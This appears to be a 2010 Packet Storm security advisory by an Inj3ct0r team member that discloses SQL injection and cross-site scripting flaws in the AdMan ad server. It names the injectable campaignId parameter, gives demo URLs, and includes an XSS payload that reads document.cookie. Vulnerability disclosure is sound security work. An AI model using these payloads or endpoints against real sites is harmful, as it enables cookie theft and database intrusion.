Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSid3 effectsPACKETSTORM:90807
HistoryJun 19, 2010 - 12:00 a.m.

AdMan Standalone Ad Server Cross Site Scripting / SQL Injection

2010-06-1900:00:00
Sid3 effects
packetstormsecurity.com
16
JSON
` ===========================================================  
AdMan Standalone Ad Server SQLi AND XSS Vulnerability  
===========================================================  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################## 1  
0 I'm Sid3^effects member from Inj3ct0r Team 1  
1 ########################################## 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
Name : AdMan Standalone Ad Server SQLi AND XSS Vulnerability  
Date : june, 18 2010  
Vendor url :http://www.formfields.com/adManArea/adManDemo.php  
Critical Level : HIGH  
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>  
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_  
greetz to :All ICW members and my friends :) luv y0 guyz   
#######################################################################################################  
DESCRIPTION:  
AdMan is a standalone Ad Server that provides publishers with a way to organize ads, view real-time traffic statistics, handle online transactions and interact with advertisers. AdMan is the perfect tool for companies wishing to eliminate commission charges from advertising middlemen and provide more customizable ad products to their advertisers. AdMan is compatible with many other ad management services like Google AdSense, AdBrite, and Commission Junction. This way you can centralize your ad reporting and even provide more customizable ad products to premiere advertisers. Moreover, AdMan utilizes iframes and can therefore be plugged into any existing website architecture. Features: Manage your ads, sell your ads, manage advertisers, provide real time reporting, integrate with 3rd party suppliers, accept credit card payments and much more!   
  
#######################################################################################################  
Xploit: SQLI Vulnerability   
  
DEMO URL : http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[SQLI]  
  
###############################################################################################################  
Xploit: XSS Vulnerability   
  
Attack Pattern: "><script>alert(document.cookie)</script>  
  
DEMO URL :http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[XSS]  
###############################################################################################################  
# 0day no more   
# Sid3^effects   
`
JSON